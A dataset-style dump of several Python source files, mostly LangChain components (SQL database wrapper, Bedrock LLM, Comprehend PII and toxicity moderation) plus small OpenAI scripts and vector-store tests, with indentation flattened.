print("\nAI: Hey, what's the question? ")
search = input("Me: ")
list_engines = ["text-davinci-002", "text-curie-001", "text-babbage-001",
"text-ada-001", "code-davinci-002", "code-cushman-001"]
engine = list_engines[0]
temp = 0.5
toxens = 256
if search:
response = openai.Completion.create(
engine=engine,
prompt=search,
temperature=temp,
max_tokens=toxens,
)
text =str(response["choices"][0]["text"]).strip()
print("AI :" +text)
| [] |
2024-01-10 | cstone-io/flamingo-frameworks-api | src~services~core.py | import chromadb
from chromadb.config import Settings
from langchain.chat_models import ChatOpenAI
from langchain.vectorstores import Chroma
from langchain.chains import RetrievalQA
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.callbacks.manager import CallbackManager
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
from ..models.inputs import Query
from ..models.outputs import ChatResponse
from ..utils.config import Config
"""
Public Services
"""
config = Config.get()
chroma_kwargs = config.chromadb.to_dict()
chroma = chromadb.HttpClient(
**chroma_kwargs, settings=Settings(chroma_api_impl="chromadb.api.fastapi.FastAPI")
)
async def chat(body: Query) -> ChatResponse:
"""
Text report agent controller. This controller is responsible for handling
requests to the /agents/text route.
:param body: Query object
:returns: string answer for successful requests
"""
embeddings = OpenAIEmbeddings()
vector_db = Chroma(client=chroma, embedding_function=embeddings)
retriever = vector_db.as_retriever()
llm_open = ChatOpenAI(
model=config.langchain.model,
callback_manager=CallbackManager([StreamingStdOutCallbackHandler()]),
)
qa_chain = RetrievalQA.from_chain_type(
llm=llm_open,
chain_type="stuff",
retriever=retriever,
return_source_documents=True,
verbose=True,
)
chain_output = qa_chain(body.query)
llm_response = ChatResponse(
answer=chain_output["result"],
sources=chain_output["source_documents"],
)
return llm_response
| [] |
2024-01-10 | glm3/TokenThrift | tests~test_initialization.py | import pytest
from unittest.mock import Mock
from token_thrift.token_thrift import TokenThrift
from token_thrift.queues.list_queue import ListQueue
from token_thrift.api_client.openai_api_client import OpenAIApiClient
class TestTokenThrift:
@classmethod
def setup_class(cls):
cls.api_key = "sample_api_key"
cls.budget_in_dollars = 500
cls.queue = ListQueue()
def test_initialization_with_valid_inputs(self):
thrift = TokenThrift(self.api_key, self.budget_in_dollars, self.queue)
assert thrift.api_key == self.api_key
assert thrift.budget_in_dollars == self.budget_in_dollars
assert thrift.total_dollar_spent == 0
assert thrift.queue.is_empty()
assert isinstance(thrift.api_client, OpenAIApiClient)
def test_initialization_negative_budget(self):
with pytest.raises(ValueError):
thrift = TokenThrift(self.api_key, -500, self.queue)
def test_initialization_no_api_key(self):
with pytest.raises(ValueError):
thrift = TokenThrift(None, self.budget_in_dollars, self.queue)
def test_initialization_with_valid_inputs_no_queue(self):
thrift = TokenThrift(self.api_key, self.budget_in_dollars)
assert thrift.api_key == self.api_key
assert thrift.budget_in_dollars == self.budget_in_dollars
assert thrift.total_dollar_spent == 0
assert isinstance(thrift.queue, ListQueue)
def test_initialization_with_custom_api_client(self):
mock_api_client = Mock()
thrift = TokenThrift(self.api_key, self.budget_in_dollars, api_client=mock_api_client)
assert thrift.api_client == mock_api_client | [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~utilities~sql_database.py | """SQLAlchemy wrapper around a database."""
from __future__ import annotations
import warnings
from typing import Any, Dict, Iterable, List, Literal, Optional, Sequence, Union
import sqlalchemy
from sqlalchemy import MetaData, Table, create_engine, inspect, select, text
from sqlalchemy.engine import Engine
from sqlalchemy.exc import ProgrammingError, SQLAlchemyError
from sqlalchemy.schema import CreateTable
from sqlalchemy.types import NullType
from langchain.utils import get_from_env
def _format_index(index: sqlalchemy.engine.interfaces.ReflectedIndex) -> str:
return (
f'Name: {index["name"]}, Unique: {index["unique"]},'
f' Columns: {str(index["column_names"])}'
)
def truncate_word(content: Any, *, length: int, suffix: str = "...") -> str:
"""
Truncate a string to a certain number of words, based on the max string
length.
"""
if not isinstance(content, str) or length <= 0:
return content
if len(content) <= length:
return content
return content[: length - len(suffix)].rsplit(" ", 1)[0] + suffix
class SQLDatabase:
"""SQLAlchemy wrapper around a database."""
def __init__(
self,
engine: Engine,
schema: Optional[str] = None,
metadata: Optional[MetaData] = None,
ignore_tables: Optional[List[str]] = None,
include_tables: Optional[List[str]] = None,
sample_rows_in_table_info: int = 3,
indexes_in_table_info: bool = False,
custom_table_info: Optional[dict] = None,
view_support: bool = False,
max_string_length: int = 300,
):
"""Create engine from database URI."""
self._engine = engine
self._schema = schema
if include_tables and ignore_tables:
raise ValueError("Cannot specify both include_tables and ignore_tables")
self._inspector = inspect(self._engine)
# including view support by adding the views as well as tables to the all
# tables list if view_support is True
self._all_tables = set(
self._inspector.get_table_names(schema=schema)
+ (self._inspector.get_view_names(schema=schema) if view_support else [])
)
self._include_tables = set(include_tables) if include_tables else set()
if self._include_tables:
missing_tables = self._include_tables - self._all_tables
if missing_tables:
raise ValueError(
f"include_tables {missing_tables} not found in database"
)
self._ignore_tables = set(ignore_tables) if ignore_tables else set()
if self._ignore_tables:
missing_tables = self._ignore_tables - self._all_tables
if missing_tables:
raise ValueError(
f"ignore_tables {missing_tables} not found in database"
)
usable_tables = self.get_usable_table_names()
self._usable_tables = set(usable_tables) if usable_tables else self._all_tables
if not isinstance(sample_rows_in_table_info, int):
raise TypeError("sample_rows_in_table_info must be an integer")
self._sample_rows_in_table_info = sample_rows_in_table_info
self._indexes_in_table_info = indexes_in_table_info
self._custom_table_info = custom_table_info
if self._custom_table_info:
if not isinstance(self._custom_table_info, dict):
raise TypeError(
"table_info must be a dictionary with table names as keys and the "
"desired table info as values"
)
# only keep the tables that are also present in the database
intersection = set(self._custom_table_info).intersection(self._all_tables)
self._custom_table_info = dict(
(table, self._custom_table_info[table])
for table in self._custom_table_info
if table in intersection
)
self._max_string_length = max_string_length
self._metadata = metadata or MetaData()
# including view support if view_support = true
self._metadata.reflect(
views=view_support,
bind=self._engine,
only=list(self._usable_tables),
schema=self._schema,
)
@classmethod
def from_uri(
cls, database_uri: str, engine_args: Optional[dict] = None, **kwargs: Any
) -> SQLDatabase:
"""Construct a SQLAlchemy engine from URI."""
_engine_args = engine_args or {}
return cls(create_engine(database_uri, **_engine_args), **kwargs)
@classmethod
def from_databricks(
cls,
catalog: str,
schema: str,
host: Optional[str] = None,
api_token: Optional[str] = None,
warehouse_id: Optional[str] = None,
cluster_id: Optional[str] = None,
engine_args: Optional[dict] = None,
**kwargs: Any,
) -> SQLDatabase:
"""
Class method to create an SQLDatabase instance from a Databricks connection.
This method requires the 'databricks-sql-connector' package. If not installed,
it can be added using `pip install databricks-sql-connector`.
Args:
catalog (str): The catalog name in the Databricks database.
schema (str): The schema name in the catalog.
host (Optional[str]): The Databricks workspace hostname, excluding
'https://' part. If not provided, it attempts to fetch from the
environment variable 'DATABRICKS_HOST'. If still unavailable and if
running in a Databricks notebook, it defaults to the current workspace
hostname. Defaults to None.
api_token (Optional[str]): The Databricks personal access token for
accessing the Databricks SQL warehouse or the cluster. If not provided,
it attempts to fetch from 'DATABRICKS_TOKEN'. If still unavailable
and running in a Databricks notebook, a temporary token for the current
user is generated. Defaults to None.
warehouse_id (Optional[str]): The warehouse ID in the Databricks SQL. If
provided, the method configures the connection to use this warehouse.
Cannot be used with 'cluster_id'. Defaults to None.
cluster_id (Optional[str]): The cluster ID in the Databricks Runtime. If
provided, the method configures the connection to use this cluster.
Cannot be used with 'warehouse_id'. If running in a Databricks notebook
and both 'warehouse_id' and 'cluster_id' are None, it uses the ID of the
cluster the notebook is attached to. Defaults to None.
engine_args (Optional[dict]): The arguments to be used when connecting
Databricks. Defaults to None.
**kwargs (Any): Additional keyword arguments for the `from_uri` method.
Returns:
SQLDatabase: An instance of SQLDatabase configured with the provided
Databricks connection details.
Raises:
ValueError: If 'databricks-sql-connector' is not found, or if both
'warehouse_id' and 'cluster_id' are provided, or if neither
'warehouse_id' nor 'cluster_id' are provided and it's not executing
inside a Databricks notebook.
"""
try:
from databricks import sql # noqa: F401
except ImportError:
raise ValueError(
"databricks-sql-connector package not found, please install with"
" `pip install databricks-sql-connector`"
)
context = None
try:
from dbruntime.databricks_repl_context import get_context
context = get_context()
except ImportError:
pass
default_host = context.browserHostName if context else None
if host is None:
host = get_from_env("host", "DATABRICKS_HOST", default_host)
default_api_token = context.apiToken if context else None
if api_token is None:
api_token = get_from_env("api_token", "DATABRICKS_TOKEN", default_api_token)
if warehouse_id is None and cluster_id is None:
if context:
cluster_id = context.clusterId
else:
raise ValueError(
"Need to provide either 'warehouse_id' or 'cluster_id'."
)
if warehouse_id and cluster_id:
raise ValueError("Can't have both 'warehouse_id' or 'cluster_id'.")
if warehouse_id:
http_path = f"/sql/1.0/warehouses/{warehouse_id}"
else:
http_path = f"/sql/protocolv1/o/0/{cluster_id}"
uri = (
f"databricks://token:{api_token}@{host}?"
f"http_path={http_path}&catalog={catalog}&schema={schema}"
)
return cls.from_uri(database_uri=uri, engine_args=engine_args, **kwargs)
@classmethod
def from_cnosdb(
cls,
url: str = "127.0.0.1:8902",
user: str = "root",
password: str = "",
tenant: str = "cnosdb",
database: str = "public",
) -> SQLDatabase:
"""
Class method to create an SQLDatabase instance from a CnosDB connection.
This method requires the 'cnos-connector' package. If not installed, it
can be added using `pip install cnos-connector`.
Args:
url (str): The HTTP connection host name and port number of the CnosDB
service, excluding "http://" or "https://", with a default value
of "127.0.0.1:8902".
user (str): The username used to connect to the CnosDB service, with a
default value of "root".
password (str): The password of the user connecting to the CnosDB service,
with a default value of "".
tenant (str): The name of the tenant used to connect to the CnosDB service,
with a default value of "cnosdb".
database (str): The name of the database in the CnosDB tenant.
Returns:
SQLDatabase: An instance of SQLDatabase configured with the provided
CnosDB connection details.
"""
try:
from cnosdb_connector import make_cnosdb_langchain_uri
uri = make_cnosdb_langchain_uri(url, user, password, tenant, database)
return cls.from_uri(database_uri=uri)
except ImportError:
raise ValueError(
"cnos-connector package not found, please install with"
" `pip install cnos-connector`"
)
@property
def dialect(self) -> str:
"""Return string representation of dialect to use."""
return self._engine.dialect.name
def get_usable_table_names(self) -> Iterable[str]:
"""Get names of tables available."""
if self._include_tables:
return sorted(self._include_tables)
return sorted(self._all_tables - self._ignore_tables)
def get_table_names(self) -> Iterable[str]:
"""Get names of tables available."""
warnings.warn(
"This method is deprecated - please use `get_usable_table_names`."
)
return self.get_usable_table_names()
@property
def table_info(self) -> str:
"""Information about all tables in the database."""
return self.get_table_info()
def get_table_info(self, table_names: Optional[List[str]] = None) -> str:
"""Get information about specified tables.
Follows best practices as specified in: Rajkumar et al, 2022
(https://arxiv.org/abs/2204.00498)
If `sample_rows_in_table_info`, the specified number of sample rows will be
appended to each table description. This can increase performance as
demonstrated in the paper.
"""
all_table_names = self.get_usable_table_names()
if table_names is not None:
missing_tables = set(table_names).difference(all_table_names)
if missing_tables:
raise ValueError(f"table_names {missing_tables} not found in database")
all_table_names = table_names
meta_tables = [
tbl
for tbl in self._metadata.sorted_tables
if tbl.name in set(all_table_names)
and not (self.dialect == "sqlite" and tbl.name.startswith("sqlite_"))
]
tables = []
for table in meta_tables:
if self._custom_table_info and table.name in self._custom_table_info:
tables.append(self._custom_table_info[table.name])
continue
# Ignore JSON datatyped columns
for k, v in table.columns.items():
if type(v.type) is NullType:
table._columns.remove(v)
# add create table command
create_table = str(CreateTable(table).compile(self._engine))
table_info = f"{create_table.rstrip()}"
has_extra_info = (
self._indexes_in_table_info or self._sample_rows_in_table_info
)
if has_extra_info:
table_info += "\n\n/*"
if self._indexes_in_table_info:
table_info += f"\n{self._get_table_indexes(table)}\n"
if self._sample_rows_in_table_info:
table_info += f"\n{self._get_sample_rows(table)}\n"
if has_extra_info:
table_info += "*/"
tables.append(table_info)
tables.sort()
final_str = "\n\n".join(tables)
return final_str
def _get_table_indexes(self, table: Table) -> str:
indexes = self._inspector.get_indexes(table.name)
indexes_formatted = "\n".join(map(_format_index, indexes))
return f"Table Indexes:\n{indexes_formatted}"
def _get_sample_rows(self, table: Table) -> str:
# build the select command
command = select(table).limit(self._sample_rows_in_table_info)
# save the columns in string format
columns_str = "\t".join([col.name for col in table.columns])
try:
# get the sample rows
with self._engine.connect() as connection:
sample_rows_result = connection.execute(command) # type: ignore
# shorten values in the sample rows
sample_rows = list(
map(lambda ls: [str(i)[:100] for i in ls], sample_rows_result)
)
# save the sample rows in string format
sample_rows_str = "\n".join(["\t".join(row) for row in sample_rows])
# in some dialects when there are no rows in the table a
# 'ProgrammingError' is returned
except ProgrammingError:
sample_rows_str = ""
return (
f"{self._sample_rows_in_table_info} rows from {table.name} table:\n"
f"{columns_str}\n"
f"{sample_rows_str}"
)
def _execute(
self,
command: str,
fetch: Union[Literal["all"], Literal["one"]] = "all",
) -> Sequence[Dict[str, Any]]:
"""
Executes SQL command through underlying engine.
If the statement returns no rows, an empty list is returned.
"""
with self._engine.begin() as connection:
if self._schema is not None:
if self.dialect == "snowflake":
connection.exec_driver_sql(
f"ALTER SESSION SET search_path='{self._schema}'"
)
elif self.dialect == "bigquery":
connection.exec_driver_sql(f"SET @@dataset_id='{self._schema}'")
elif self.dialect == "mssql":
pass
elif self.dialect == "trino":
connection.exec_driver_sql(f"USE {self._schema}")
else: # postgresql and compatible dialects
connection.exec_driver_sql(f"SET search_path TO {self._schema}")
cursor = connection.execute(text(command))
if cursor.returns_rows:
if fetch == "all":
result = [x._asdict() for x in cursor.fetchall()]
elif fetch == "one":
first_result = cursor.fetchone()
result = [] if first_result is None else [first_result._asdict()]
else:
raise ValueError("Fetch parameter must be either 'one' or 'all'")
return result
return []
def run(
self,
command: str,
fetch: Union[Literal["all"], Literal["one"]] = "all",
) -> str:
"""Execute a SQL command and return a string representing the results.
If the statement returns rows, a string of the results is returned.
If the statement returns no rows, an empty string is returned.
"""
result = self._execute(command, fetch)
# Convert columns values to string to avoid issues with sqlalchemy
# truncating text
res = [
tuple(truncate_word(c, length=self._max_string_length) for c in r.values())
for r in result
]
if not res:
return ""
else:
return str(res)
def get_table_info_no_throw(self, table_names: Optional[List[str]] = None) -> str:
"""Get information about specified tables.
Follows best practices as specified in: Rajkumar et al, 2022
(https://arxiv.org/abs/2204.00498)
If `sample_rows_in_table_info`, the specified number of sample rows will be
appended to each table description. This can increase performance as
demonstrated in the paper.
"""
try:
return self.get_table_info(table_names)
except ValueError as e:
"""Format the error message"""
return f"Error: {e}"
def run_no_throw(
self,
command: str,
fetch: Union[Literal["all"], Literal["one"]] = "all",
) -> str:
"""Execute a SQL command and return a string representing the results.
If the statement returns rows, a string of the results is returned.
If the statement returns no rows, an empty string is returned.
If the statement throws an error, the error message is returned.
"""
try:
return self.run(command, fetch)
except SQLAlchemyError as e:
"""Format the error message"""
return f"Error: {e}"
| [] |
2024-01-10 | ashleyxuu/langchain | libs~experimental~langchain_experimental~comprehend_moderation~pii.py | import asyncio
from typing import Any, Dict, Optional
from langchain_experimental.comprehend_moderation.base_moderation_exceptions import (
ModerationPiiError,
)
class ComprehendPII:
def __init__(
self,
client: Any,
callback: Optional[Any] = None,
unique_id: Optional[str] = None,
chain_id: Optional[str] = None,
) -> None:
self.client = client
self.moderation_beacon = {
"moderation_chain_id": chain_id,
"moderation_type": "PII",
"moderation_status": "LABELS_NOT_FOUND",
}
self.callback = callback
self.unique_id = unique_id
def validate(self, prompt_value: str, config: Any = None) -> str:
redact = config.get("redact")
return (
self._detect_pii(prompt_value=prompt_value, config=config)
if redact
else self._contains_pii(prompt_value=prompt_value, config=config)
)
def _contains_pii(self, prompt_value: str, config: Any = None) -> str:
"""
Checks for Personally Identifiable Information (PII) labels above a
specified threshold. Uses Amazon Comprehend Contains PII Entities API. See -
https://docs.aws.amazon.com/comprehend/latest/APIReference/API_ContainsPiiEntities.html
Args:
prompt_value (str): The input text to be checked for PII labels.
config (Dict[str, Any]): Configuration for PII check and actions.
Returns:
str: the original prompt
Note:
- The provided client should be initialized with valid AWS credentials.
"""
pii_identified = self.client.contains_pii_entities(
Text=prompt_value, LanguageCode="en"
)
if self.callback and self.callback.pii_callback:
self.moderation_beacon["moderation_input"] = prompt_value
self.moderation_beacon["moderation_output"] = pii_identified
threshold = config.get("threshold")
pii_labels = config.get("labels")
pii_found = False
for entity in pii_identified["Labels"]:
if (entity["Score"] >= threshold and entity["Name"] in pii_labels) or (
entity["Score"] >= threshold and not pii_labels
):
pii_found = True
break
if self.callback and self.callback.pii_callback:
if pii_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
if pii_found:
raise ModerationPiiError
return prompt_value
def _detect_pii(self, prompt_value: str, config: Optional[Dict[str, Any]]) -> str:
"""
Detects and handles Personally Identifiable Information (PII) entities in the
given prompt text using Amazon Comprehend's detect_pii_entities API. The
function provides options to redact or stop processing based on the identified
PII entities and a provided configuration. Uses Amazon Comprehend Detect PII
Entities API.
Args:
prompt_value (str): The input text to be checked for PII entities.
config (Dict[str, Any]): A configuration specifying how to handle
PII entities.
Returns:
str: The processed prompt text with redacted PII entities or raised
exceptions.
Raises:
ValueError: If the prompt contains configured PII entities for
stopping processing.
Note:
- If PII is not found in the prompt, the original prompt is returned.
- The client should be initialized with valid AWS credentials.
"""
pii_identified = self.client.detect_pii_entities(
Text=prompt_value, LanguageCode="en"
)
if self.callback and self.callback.pii_callback:
self.moderation_beacon["moderation_input"] = prompt_value
self.moderation_beacon["moderation_output"] = pii_identified
if (pii_identified["Entities"]) == []:
if self.callback and self.callback.pii_callback:
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
return prompt_value
pii_found = False
if not config and pii_identified["Entities"]:
for entity in pii_identified["Entities"]:
if entity["Score"] >= 0.5:
pii_found = True
break
if self.callback and self.callback.pii_callback:
if pii_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
if pii_found:
raise ModerationPiiError
else:
threshold = config.get("threshold") # type: ignore
pii_labels = config.get("labels") # type: ignore
mask_marker = config.get("mask_character") # type: ignore
pii_found = False
for entity in pii_identified["Entities"]:
if (
pii_labels
and entity["Type"] in pii_labels
and entity["Score"] >= threshold
) or (not pii_labels and entity["Score"] >= threshold):
pii_found = True
char_offset_begin = entity["BeginOffset"]
char_offset_end = entity["EndOffset"]
mask_length = char_offset_end - char_offset_begin + 1
masked_part = mask_marker * mask_length
prompt_value = (
prompt_value[:char_offset_begin]
+ masked_part
+ prompt_value[char_offset_end + 1 :]
)
if self.callback and self.callback.pii_callback:
if pii_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
return prompt_value
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~tests~integration_tests~vectorstores~test_xata.py | """Test Xata vector store functionality.
Before running this test, please create a Xata database by following
the instructions from:
https://python.langchain.com/docs/integrations/vectorstores/xata
"""
import os
from langchain.docstore.document import Document
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores.xata import XataVectorStore
class TestXata:
@classmethod
def setup_class(cls) -> None:
assert os.getenv("XATA_API_KEY"), "XATA_API_KEY environment variable is not set"
assert os.getenv("XATA_DB_URL"), "XATA_DB_URL environment variable is not set"
def test_similarity_search_without_metadata(
self, embedding_openai: OpenAIEmbeddings
) -> None:
"""Test end to end constructions and search without metadata."""
texts = ["foo", "bar", "baz"]
docsearch = XataVectorStore.from_texts(
api_key=os.getenv("XATA_API_KEY"),
db_url=os.getenv("XATA_DB_URL"),
texts=texts,
embedding=embedding_openai,
)
docsearch.wait_for_indexing(ndocs=3)
output = docsearch.similarity_search("foo", k=1)
assert output == [Document(page_content="foo")]
docsearch.delete(delete_all=True)
def test_similarity_search_with_metadata(
self, embedding_openai: OpenAIEmbeddings
) -> None:
"""Test end to end construction and search with a metadata filter.
This test requires a column named "a" of type integer to be present
in the Xata table."""
texts = ["foo", "foo", "foo"]
metadatas = [{"a": i} for i in range(len(texts))]
docsearch = XataVectorStore.from_texts(
api_key=os.getenv("XATA_API_KEY"),
db_url=os.getenv("XATA_DB_URL"),
texts=texts,
embedding=embedding_openai,
metadatas=metadatas,
)
docsearch.wait_for_indexing(ndocs=3)
output = docsearch.similarity_search("foo", k=1, filter={"a": 1})
assert output == [Document(page_content="foo", metadata={"a": 1})]
docsearch.delete(delete_all=True)
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~llms~bedrock.py | import json
from abc import ABC
from typing import Any, Dict, Iterator, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import BaseModel, Extra, root_validator
from langchain.schema.output import GenerationChunk
HUMAN_PROMPT = "\n\nHuman:"
ASSISTANT_PROMPT = "\n\nAssistant:"
ALTERNATION_ERROR = (
"Error: Prompt must alternate between '\n\nHuman:' and '\n\nAssistant:'."
)
def _add_newlines_before_ha(input_text: str) -> str:
new_text = input_text
for word in ["Human:", "Assistant:"]:
new_text = new_text.replace(word, "\n\n" + word)
for i in range(2):
new_text = new_text.replace("\n\n\n" + word, "\n\n" + word)
return new_text
def _human_assistant_format(input_text: str) -> str:
if input_text.count("Human:") == 0 or (
input_text.find("Human:") > input_text.find("Assistant:")
and "Assistant:" in input_text
):
input_text = HUMAN_PROMPT + " " + input_text # SILENT CORRECTION
if input_text.count("Assistant:") == 0:
input_text = input_text + ASSISTANT_PROMPT # SILENT CORRECTION
if input_text[: len("Human:")] == "Human:":
input_text = "\n\n" + input_text
input_text = _add_newlines_before_ha(input_text)
count = 0
# track alternation
for i in range(len(input_text)):
if input_text[i : i + len(HUMAN_PROMPT)] == HUMAN_PROMPT:
if count % 2 == 0:
count += 1
else:
raise ValueError(ALTERNATION_ERROR)
if input_text[i : i + len(ASSISTANT_PROMPT)] == ASSISTANT_PROMPT:
if count % 2 == 1:
count += 1
else:
raise ValueError(ALTERNATION_ERROR)
if count % 2 == 1: # Only saw Human, no Assistant
input_text = input_text + ASSISTANT_PROMPT # SILENT CORRECTION
return input_text
class LLMInputOutputAdapter:
"""Adapter class to prepare the inputs from Langchain to a format
that LLM model expects.
It also provides helper function to extract
the generated text from the model response."""
provider_to_output_key_map = {
"anthropic": "completion",
"amazon": "outputText",
}
@classmethod
def prepare_input(
cls, provider: str, prompt: str, model_kwargs: Dict[str, Any]
) -> Dict[str, Any]:
input_body = {**model_kwargs}
if provider == "anthropic":
input_body["prompt"] = _human_assistant_format(prompt)
elif provider == "ai21":
input_body["prompt"] = prompt
elif provider == "amazon":
input_body = dict()
input_body["inputText"] = prompt
input_body["textGenerationConfig"] = {**model_kwargs}
else:
input_body["inputText"] = prompt
if provider == "anthropic" and "max_tokens_to_sample" not in input_body:
input_body["max_tokens_to_sample"] = 256
return input_body
@classmethod
def prepare_output(cls, provider: str, response: Any) -> str:
if provider == "anthropic":
response_body = json.loads(response.get("body").read().decode())
return response_body.get("completion")
else:
response_body = json.loads(response.get("body").read())
if provider == "ai21":
return response_body.get("completions")[0].get("data").get("text")
else:
return response_body.get("results")[0].get("outputText")
@classmethod
def prepare_output_stream(
cls, provider: str, response: Any, stop: Optional[List[str]] = None
) -> Iterator[GenerationChunk]:
stream = response.get("body")
if not stream:
return
if provider not in cls.provider_to_output_key_map:
raise ValueError(
f"Unknown streaming response output key for provider: {provider}"
)
for event in stream:
chunk = event.get("chunk")
if chunk:
chunk_obj = json.loads(chunk.get("bytes").decode())
# chunk obj format varies with provider
yield GenerationChunk(
text=chunk_obj[cls.provider_to_output_key_map[provider]]
)
class BedrockBase(BaseModel, ABC):
client: Any #: :meta private:
region_name: Optional[str] = None
"""The aws region e.g., `us-west-2`. Fallsback to AWS_DEFAULT_REGION env variable
or region specified in ~/.aws/config in case it is not provided here.
"""
credentials_profile_name: Optional[str] = None
"""The name of the profile in the ~/.aws/credentials or ~/.aws/config files, which
has either access keys or role information specified.
If not specified, the default credential profile or, if on an EC2 instance,
credentials from IMDS will be used.
See: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
"""
model_id: str
"""Id of the model to call, e.g., amazon.titan-text-express-v1, this is
equivalent to the modelId property in the list-foundation-models api"""
model_kwargs: Optional[Dict] = None
"""Keyword arguments to pass to the model."""
endpoint_url: Optional[str] = None
"""Needed if you don't want to default to us-east-1 endpoint"""
streaming: bool = False
"""Whether to stream the results."""
provider_stop_sequence_key_name_map: Mapping[str, str] = {
"anthropic": "stop_sequences",
"amazon": "stopSequences",
"ai21": "stop_sequences",
}
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that AWS credentials to and python package exists in environment."""
# Skip creating new client if passed in constructor
if values["client"] is not None:
return values
try:
import boto3
if values["credentials_profile_name"] is not None:
session = boto3.Session(profile_name=values["credentials_profile_name"])
else:
# use default credentials
session = boto3.Session()
client_params = {}
if values["region_name"]:
client_params["region_name"] = values["region_name"]
if values["endpoint_url"]:
client_params["endpoint_url"] = values["endpoint_url"]
values["client"] = session.client("bedrock-runtime", **client_params)
except ImportError:
raise ModuleNotFoundError(
"Could not import boto3 python package. "
"Please install it with `pip install boto3`."
)
except Exception as e:
raise ValueError(
"Could not load credentials to authenticate with AWS client. "
"Please check that credentials in the specified "
"profile name are valid."
) from e
return values
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
_model_kwargs = self.model_kwargs or {}
return {
**{"model_kwargs": _model_kwargs},
}
def _get_provider(self) -> str:
return self.model_id.split(".")[0]
def _prepare_input_and_invoke(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
_model_kwargs = self.model_kwargs or {}
provider = self._get_provider()
params = {**_model_kwargs, **kwargs}
input_body = LLMInputOutputAdapter.prepare_input(provider, prompt, params)
body = json.dumps(input_body)
accept = "application/json"
contentType = "application/json"
try:
response = self.client.invoke_model(
body=body, modelId=self.model_id, accept=accept, contentType=contentType
)
text = LLMInputOutputAdapter.prepare_output(provider, response)
except Exception as e:
raise ValueError(f"Error raised by bedrock service: {e}")
if stop is not None:
text = enforce_stop_tokens(text, stop)
return text
def _prepare_input_and_invoke_stream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
_model_kwargs = self.model_kwargs or {}
provider = self._get_provider()
if stop:
if provider not in self.provider_stop_sequence_key_name_map:
raise ValueError(
f"Stop sequence key name for {provider} is not supported."
)
# stop sequence from _generate() overrides
# stop sequences in the class attribute
_model_kwargs[
self.provider_stop_sequence_key_name_map.get(provider),
] = stop
params = {**_model_kwargs, **kwargs}
input_body = LLMInputOutputAdapter.prepare_input(provider, prompt, params)
body = json.dumps(input_body)
try:
response = self.client.invoke_model_with_response_stream(
body=body,
modelId=self.model_id,
accept="application/json",
contentType="application/json",
)
except Exception as e:
raise ValueError(f"Error raised by bedrock service: {e}")
for chunk in LLMInputOutputAdapter.prepare_output_stream(
provider, response, stop
):
yield chunk
if run_manager is not None:
run_manager.on_llm_new_token(chunk.text, chunk=chunk)
class Bedrock(LLM, BedrockBase):
"""Bedrock models.
To authenticate, the AWS client uses the following methods to
automatically load credentials:
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
If a specific credential profile should be used, you must pass
the name of the profile from the ~/.aws/credentials file that is to be used.
Make sure the credentials / roles used have the required policies to
access the Bedrock service.
"""
"""
Example:
.. code-block:: python
from bedrock_langchain.bedrock_llm import BedrockLLM
llm = BedrockLLM(
credentials_profile_name="default",
model_id="amazon.titan-text-express-v1",
streaming=True
)
"""
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "amazon_bedrock"
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
def _stream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
"""Call out to Bedrock service with streaming.
Args:
prompt (str): The prompt to pass into the model
stop (Optional[List[str]], optional): Stop sequences. These will
override any stop sequences in the `model_kwargs` attribute.
Defaults to None.
run_manager (Optional[CallbackManagerForLLMRun], optional): Callback
run managers used to process the output. Defaults to None.
Returns:
Iterator[GenerationChunk]: Generator that yields the streamed responses.
Yields:
Iterator[GenerationChunk]: Responses from the model.
"""
return self._prepare_input_and_invoke_stream(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
)
def _call(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
"""Call out to Bedrock service model.
Args:
prompt: The prompt to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The string generated by the model.
Example:
.. code-block:: python
response = llm("Tell me a joke.")
"""
if self.streaming:
completion = ""
for chunk in self._stream(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
):
completion += chunk.text
return completion
return self._prepare_input_and_invoke(prompt=prompt, stop=stop, **kwargs)
| [
"\n\nAssistant:",
"\n\nHuman:"
] |
2024-01-10 | ashleyxuu/langchain | libs~experimental~langchain_experimental~comprehend_moderation~toxicity.py | import asyncio
import importlib
from typing import Any, List, Optional
from langchain_experimental.comprehend_moderation.base_moderation_exceptions import (
ModerationToxicityError,
)
class ComprehendToxicity:
def __init__(
self,
client: Any,
callback: Optional[Any] = None,
unique_id: Optional[str] = None,
chain_id: Optional[str] = None,
) -> None:
self.client = client
self.moderation_beacon = {
"moderation_chain_id": chain_id,
"moderation_type": "Toxicity",
"moderation_status": "LABELS_NOT_FOUND",
}
self.callback = callback
self.unique_id = unique_id
